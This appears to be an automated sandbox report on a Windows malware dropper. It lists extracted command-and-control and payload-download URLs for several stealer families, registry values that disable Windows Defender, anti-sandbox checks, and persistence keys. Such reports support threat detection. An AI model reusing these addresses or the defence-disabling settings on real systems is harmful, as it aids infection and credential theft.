Analysis
-
max time kernel
149s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20250217-en -
resource tags
arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system -
submitted
20-02-2025 00:32
Static task
static1
Behavioral task
behavioral1
Sample
5f21f5677d9cdc6313895450c2c169f170db029f491311203b22281a715f1201.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
5f21f5677d9cdc6313895450c2c169f170db029f491311203b22281a715f1201.exe
Resource
win10v2004-20250217-en
General
-
Target
5f21f5677d9cdc6313895450c2c169f170db029f491311203b22281a715f1201.exe
-
Size
938KB
-
MD5
a395184a62ce20f7505664209dfc9b6d
-
SHA1
fe2ae192812df97e9a24b41fd1b045e8cb8e2c90
-
SHA256
5f21f5677d9cdc6313895450c2c169f170db029f491311203b22281a715f1201
-
SHA512
ddbd56812b6839c3a4e7a360de9a0a5acb5f4f4f5676cb7f9f544131684d64d9c306b78781ce2b8ba511ad7aa88c43ae34c69fa0c0f936303400970e39476b10
-
SSDEEP
24576:KqDEvCTbMWu7rQYlBQcBiT6rprG8ayTF:KTvC/MTQYxsWR7ayT
Malware Config
Extracted
http://185.215.113.16/mine/random.exe
Extracted
http://185.215.113.16/defend/random.exe
Extracted
http://185.215.113.16/mine/random.exe
Extracted
http://185.215.113.16/mine/random.exe
Extracted
amadey
4.42
9c9aa5
http://185.215.113.43
-
install_dir
abc3bc1985
-
install_file
skotes.exe
-
strings_key
8a35cf2ea38c2817dba29a4b5b25dcf0
-
url_paths
/Zu7JuNko/index.php
Extracted
systembc
cobolrationumelawrtewarms.co:4001
93.186.202.3:4001
-
dns
5.132.191.104
ns1.vic.au.dns.opennic.glue
ns2.vic.au.dns.opennic.glue
Extracted
redline
cheat
103.84.89.222:33791
Extracted
stealc
default
http://ecozessentials.com
-
url_path
/e6cb1c8fc7cd1659.php
Extracted
cryptbot
http://home.fivenn5sr.top/DoDOGDWnPbpMwhmjDvNk17
Extracted
vidar
https://t.me/g02f04
https://steamcommunity.com/profiles/76561199828130190
-
user_agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/131.0.0.0 Safari/537.36 OPR/116.0.0.0
Extracted
stealc
reno
http://185.215.113.115
-
url_path
/c4becf79229cb002.php
Signatures
-
Amadey family
-
Cryptbot family
-
Detect Vidar Stealer 11 IoCs
resource yara_rule behavioral2/memory/4532-703-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral2/memory/4532-705-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral2/memory/4532-706-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral2/memory/4532-725-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral2/memory/4532-742-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral2/memory/4532-754-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral2/memory/4532-882-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral2/memory/4532-883-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral2/memory/4532-886-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral2/memory/4532-892-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral2/memory/4532-893-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 -
Detects CryptBot payload 1 IoCs
CryptBot is a C++ stealer distributed widely in bundle with other software.
resource yara_rule behavioral2/memory/4104-673-0x0000000069CC0000-0x000000006A71B000-memory.dmp family_cryptbot_v3 -
Detects Healer an antivirus disabler dropper 3 IoCs
resource yara_rule behavioral2/memory/2396-156-0x00000000005B0000-0x00000000009EC000-memory.dmp healer behavioral2/memory/2396-157-0x00000000005B0000-0x00000000009EC000-memory.dmp healer behavioral2/memory/2396-267-0x00000000005B0000-0x00000000009EC000-memory.dmp healer -
Healer family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" TempCVUKSYKBKZBYUQECJTUKHNINUFUBOHIJ.EXE -
Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" TempCVUKSYKBKZBYUQECJTUKHNINUFUBOHIJ.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" TempCVUKSYKBKZBYUQECJTUKHNINUFUBOHIJ.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" TempCVUKSYKBKZBYUQECJTUKHNINUFUBOHIJ.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" TempCVUKSYKBKZBYUQECJTUKHNINUFUBOHIJ.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" TempCVUKSYKBKZBYUQECJTUKHNINUFUBOHIJ.EXE Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection TempCVUKSYKBKZBYUQECJTUKHNINUFUBOHIJ.EXE -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" TempCVUKSYKBKZBYUQECJTUKHNINUFUBOHIJ.EXE -
Modifies Windows Defender notification settings 3 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications TempCVUKSYKBKZBYUQECJTUKHNINUFUBOHIJ.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" TempCVUKSYKBKZBYUQECJTUKHNINUFUBOHIJ.EXE -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
Redline family
-
SectopRAT payload 2 IoCs
resource yara_rule behavioral2/memory/3648-215-0x0000000000EE0000-0x0000000001358000-memory.dmp family_sectoprat behavioral2/memory/3648-216-0x0000000000EE0000-0x0000000001358000-memory.dmp family_sectoprat -
Sectoprat family
-
Stealc family
-
Systembc family
-
Vidar family
-
Enumerates VirtualBox registry keys 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxSF 90ced29b15.exe -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 25 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ lpsbw.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 6ccbdd7074.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 0519cf3c64.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 4c708b9de9.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ kdMujZh.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ okhxpkh.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempCVUKSYKBKZBYUQECJTUKHNINUFUBOHIJ.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 18b64e1917.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 40e0b6ad21.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ d2YQIJa.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 198cfc7201.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 0f807048bd.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 90ced29b15.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempVTMZEVGJD6GVC5WRW71CZPT2AU5O57WY.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 95c0f4af36.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ lpsbw.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 8827e2f2e3.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ ee1401f004.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempPWOPLEBXNAP7WZSLLCZKU8XKUNEIJTQ6.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ kdMujZh.exe -
Blocklisted process makes network request 64 IoCs
flow pid Process 17 1680 powershell.exe 47 3352 powershell.exe 49 1132 powershell.exe 130 2812 powershell.exe 134 2812 powershell.exe 155 2812 powershell.exe 160 2812 powershell.exe 166 2812 powershell.exe 171 2812 powershell.exe 172 2812 powershell.exe 173 2812 powershell.exe 174 2812 powershell.exe 175 2812 powershell.exe 178 2812 powershell.exe 181 2812 powershell.exe 182 2812 powershell.exe 187 2812 powershell.exe 190 2812 powershell.exe 194 2812 powershell.exe 195 2812 powershell.exe 196 2812 powershell.exe 197 2812 powershell.exe 198 2812 powershell.exe 199 2812 powershell.exe 200 2812 powershell.exe 201 2812 powershell.exe 202 2812 powershell.exe 203 2812 powershell.exe 204 2812 powershell.exe 205 2812 powershell.exe 206 2812 powershell.exe 207 2812 powershell.exe 208 2812 powershell.exe 220 2812 powershell.exe 226 2812 powershell.exe 231 2812 powershell.exe 232 2812 powershell.exe 233 2812 powershell.exe 234 4288 powershell.exe 237 2812 powershell.exe 238 2812 powershell.exe 287 2812 powershell.exe 314 2812 powershell.exe 319 2812 powershell.exe 320 2812 powershell.exe 325 2812 powershell.exe 332 2812 powershell.exe 333 2812 powershell.exe 336 2812 powershell.exe 345 2812 powershell.exe 346 2812 powershell.exe 354 2812 powershell.exe 357 2812 powershell.exe 360 2812 powershell.exe 362 2812 powershell.exe 363 2812 powershell.exe 371 2812 powershell.exe 372 2812 powershell.exe 373 2812 powershell.exe 376 2812 powershell.exe 377 2812 powershell.exe 379 2812 powershell.exe 382 2812 powershell.exe 384 2812 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 9 IoCs
Run Powershell and hide display window.
pid Process 1680 powershell.exe 3352 powershell.exe 1132 powershell.exe 5784 powershell.exe 4288 powershell.exe 1336 powershell.exe 4620 powershell.exe 2868 powershell.exe 1956 powershell.exe -
Downloads MZ/PE file 36 IoCs
flow pid Process 49 1132 powershell.exe 418 5356 futors.exe 512 5356 futors.exe 22 404 skotes.exe 22 404 skotes.exe 22 404 skotes.exe 22 404 skotes.exe 22 404 skotes.exe 22 404 skotes.exe 22 404 skotes.exe 22 404 skotes.exe 22 404 skotes.exe 22 404 skotes.exe 22 404 skotes.exe 22 404 skotes.exe 22 404 skotes.exe 22 404 skotes.exe 22 404 skotes.exe 42 404 skotes.exe 42 404 skotes.exe 42 404 skotes.exe 42 404 skotes.exe 42 404 skotes.exe 364 5160 ee1401f004.exe 364 5160 ee1401f004.exe 364 5160 ee1401f004.exe 364 5160 ee1401f004.exe 364 5160 ee1401f004.exe 364 5160 ee1401f004.exe 234 4288 powershell.exe 348 5356 futors.exe 348 5356 futors.exe 348 5356 futors.exe 348 5356 futors.exe 17 1680 powershell.exe 47 3352 powershell.exe -
Uses browser remote debugging 2 TTPs 14 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
pid Process 1372 msedge.exe 5764 msedge.exe 400 chrome.exe 4780 chrome.exe 3992 chrome.exe 1432 msedge.exe 6528 msedge.exe 6520 msedge.exe 1904 chrome.exe 4740 chrome.exe 5140 chrome.exe 5916 chrome.exe 4224 chrome.exe 5604 chrome.exe -
Checks BIOS information in registry 2 TTPs 46 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 4c708b9de9.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 6ccbdd7074.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion ee1401f004.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempVTMZEVGJD6GVC5WRW71CZPT2AU5O57WY.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 95c0f4af36.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 4c708b9de9.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 90ced29b15.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion kdMujZh.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion okhxpkh.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempCVUKSYKBKZBYUQECJTUKHNINUFUBOHIJ.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 18b64e1917.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 6ccbdd7074.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 0519cf3c64.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 95c0f4af36.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion okhxpkh.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempCVUKSYKBKZBYUQECJTUKHNINUFUBOHIJ.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 0519cf3c64.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 0f807048bd.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion d2YQIJa.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion kdMujZh.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempVTMZEVGJD6GVC5WRW71CZPT2AU5O57WY.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempPWOPLEBXNAP7WZSLLCZKU8XKUNEIJTQ6.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempPWOPLEBXNAP7WZSLLCZKU8XKUNEIJTQ6.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion ee1401f004.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 90ced29b15.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion d2YQIJa.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion kdMujZh.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 8827e2f2e3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion lpsbw.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion lpsbw.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 8827e2f2e3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 0f807048bd.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 18b64e1917.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 40e0b6ad21.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 40e0b6ad21.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 198cfc7201.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion kdMujZh.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 198cfc7201.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe -
Checks computer location settings 2 TTPs 8 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Control Panel\International\Geo\Nation amnew.exe Key value queried \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Control Panel\International\Geo\Nation futors.exe Key value queried \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Control Panel\International\Geo\Nation TempPWOPLEBXNAP7WZSLLCZKU8XKUNEIJTQ6.EXE Key value queried \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Control Panel\International\Geo\Nation skotes.exe Key value queried \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Control Panel\International\Geo\Nation mshta.exe -
Drops startup file 2 IoCs
description ioc Process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat powershell.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat powershell.exe -
Executes dropped EXE 58 IoCs
pid Process 4120 TempPWOPLEBXNAP7WZSLLCZKU8XKUNEIJTQ6.EXE 404 skotes.exe 3364 kdMujZh.exe 2276 skotes.exe 4600 8827e2f2e3.exe 2224 e4c9d2bfff.exe 2432 okhxpkh.exe 2396 TempCVUKSYKBKZBYUQECJTUKHNINUFUBOHIJ.EXE 3648 0f807048bd.exe 4604 483d2fa8a0d53818306efeb32d3.exe 3360 18b64e1917.exe 4104 90ced29b15.exe 880 40e0b6ad21.exe 4544 d2YQIJa.exe 3952 f3Ypd8O.exe 3052 f3Ypd8O.exe 2512 f3Ypd8O.exe 1948 7aencsM.exe 4532 7aencsM.exe 2632 kdMujZh.exe 5604 9aiiMOQ.exe 5652 9aiiMOQ.exe 5660 9aiiMOQ.exe 5672 9aiiMOQ.exe 5684 9aiiMOQ.exe 5692 9aiiMOQ.exe 5236 198cfc7201.exe 5496 ymy1CwP.exe 5868 ymy1CwP.exe 5816 lpsbw.exe 6080 6ccbdd7074.exe 4544 skotes.exe 5160 ee1401f004.exe 1072 dd8dbe5ac0.exe 4588 0f8ce684d7.exe 5404 amnew.exe 2664 TempVTMZEVGJD6GVC5WRW71CZPT2AU5O57WY.EXE 5356 futors.exe 6828 f613a12ef8.exe 6388 c6a31d1295.exe 3060 trano1221.exe 6772 trano1221.exe 3380 con12312211221.exe 5380 con12312211221.exe 7104 0519cf3c64.exe 6740 monthdragon.exe 6720 monthdragon.exe 6756 monthdragon.exe 7048 12321321.exe 1880 alex12112.exe 6420 alex12112.exe 5160 fher.exe 6352 fher.exe 1372 fher.exe 5752 95c0f4af36.exe 6564 4c708b9de9.exe 5680 lpsbw.exe 5944 skotes.exe -
Identifies Wine through registry keys 2 TTPs 25 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine TempPWOPLEBXNAP7WZSLLCZKU8XKUNEIJTQ6.EXE Key opened \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine okhxpkh.exe Key opened \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine 198cfc7201.exe Key opened \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine lpsbw.exe Key opened \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine 95c0f4af36.exe Key opened \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine 8827e2f2e3.exe Key opened \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine 18b64e1917.exe Key opened \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine 40e0b6ad21.exe Key opened \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine 4c708b9de9.exe Key opened \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine kdMujZh.exe Key opened \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine TempCVUKSYKBKZBYUQECJTUKHNINUFUBOHIJ.EXE Key opened \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine kdMujZh.exe Key opened \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine ee1401f004.exe Key opened \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine 0519cf3c64.exe Key opened \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine 0f807048bd.exe Key opened \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine 90ced29b15.exe Key opened \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine d2YQIJa.exe Key opened \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine 6ccbdd7074.exe Key opened \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine TempVTMZEVGJD6GVC5WRW71CZPT2AU5O57WY.EXE Key opened \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine lpsbw.exe Key opened \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine skotes.exe -
Loads dropped DLL 33 IoCs
pid Process 6772 trano1221.exe 6772 trano1221.exe 6772 trano1221.exe 6772 trano1221.exe 6772 trano1221.exe 6772 trano1221.exe 6772 trano1221.exe 6772 trano1221.exe 6772 trano1221.exe 6772 trano1221.exe 6772 trano1221.exe 6772 trano1221.exe 6772 trano1221.exe 6772 trano1221.exe 6772 trano1221.exe 6772 trano1221.exe 6772 trano1221.exe 6772 trano1221.exe 6772 trano1221.exe 6772 trano1221.exe 6772 trano1221.exe 6772 trano1221.exe 6772 trano1221.exe 6772 trano1221.exe 6772 trano1221.exe 6772 trano1221.exe 6772 trano1221.exe 6772 trano1221.exe 6772 trano1221.exe 6772 trano1221.exe 6772 trano1221.exe 5160 ee1401f004.exe 5160 ee1401f004.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Windows security modification 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features TempCVUKSYKBKZBYUQECJTUKHNINUFUBOHIJ.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" TempCVUKSYKBKZBYUQECJTUKHNINUFUBOHIJ.EXE -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 8 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dd8dbe5ac0.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1088437001\\dd8dbe5ac0.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\0f8ce684d7.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1088438001\\0f8ce684d7.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\95c0f4af36.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10008990101\\95c0f4af36.exe" futors.exe Set value (str) \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\4c708b9de9.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10009000101\\4c708b9de9.exe" futors.exe Set value (str) \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\e4c9d2bfff.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1088415101\\e4c9d2bfff.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1088416021\\am_no.cmd" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\6ccbdd7074.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1088435001\\6ccbdd7074.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ee1401f004.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1088436001\\ee1401f004.exe" skotes.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
AutoIT Executable 3 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral2/files/0x000c000000023b2b-92.dat autoit_exe behavioral2/files/0x0007000000023cdb-1050.dat autoit_exe behavioral2/files/0x0007000000023ce4-1094.dat autoit_exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 23 IoCs
pid Process 4120 TempPWOPLEBXNAP7WZSLLCZKU8XKUNEIJTQ6.EXE 404 skotes.exe 3364 kdMujZh.exe 2276 skotes.exe 4600 8827e2f2e3.exe 2432 okhxpkh.exe 2396 TempCVUKSYKBKZBYUQECJTUKHNINUFUBOHIJ.EXE 3648 0f807048bd.exe 4604 483d2fa8a0d53818306efeb32d3.exe 3360 18b64e1917.exe 4104 90ced29b15.exe 880 40e0b6ad21.exe 4544 d2YQIJa.exe 2632 kdMujZh.exe 5236 198cfc7201.exe 5816 lpsbw.exe 6080 6ccbdd7074.exe 4544 skotes.exe 5160 ee1401f004.exe 2664 TempVTMZEVGJD6GVC5WRW71CZPT2AU5O57WY.EXE 7104 0519cf3c64.exe 5752 95c0f4af36.exe 6564 4c708b9de9.exe -
Suspicious use of SetThreadContext 9 IoCs
